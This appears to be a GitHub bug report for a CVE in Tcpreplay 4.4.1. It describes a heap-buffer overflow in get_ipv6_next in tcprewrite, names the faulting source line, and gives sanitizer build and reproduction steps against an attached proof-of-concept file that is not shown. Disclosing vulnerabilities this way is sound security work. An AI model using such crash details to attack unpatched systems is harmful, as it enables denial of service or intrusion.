The component tcprewrite in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in get_ipv6_next at common/get.c:713. NOTE: this is different from CVE-2022-27940.

You are opening a _bug report_ against the Tcpreplay project: we use  
GitHub Issues for tracking bug reports and feature requests.

If you have a question about how to use Tcpreplay, you are at the wrong  
site. You can ask a question on the tcpreplay-users mailing list  
or on Stack Overflow with \[tcpreplay\] tag.  
General help is available here.

If you have a build issue, consider downloading the latest release

Otherwise, to report a bug, please fill out the reproduction steps  
(below) and delete these introductory paragraphs. Thanks!

**Describe the bug**  
There is a heap-overflow bug in get\_ipv6\_next. Different from #718 (The crash point is in line 679, *((int*)((u_char *)exthdr + len))), this bug is triggered in line 713 (*((int*)((u_char *)exthdr + len)) > maxlen).

**To Reproduce**  
Steps to reproduce the behavior:

1.  export CC=clang && export CFLAGS="-fsanitize=address -g"
2.  ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8
3.  ./src/tcprewrite -o /dev/null -i POC

**Expected behavior**  
A clear and concise description of what you expected to happen.  
The program does not crash.

**Screenshots**  

**System (please complete the following information):**

*   OS: Debian
*   OS version: buster
*   Tcpreplay Version: 09f0774

**Additional context**  
**POC**  
poc.zip

Tag

#debian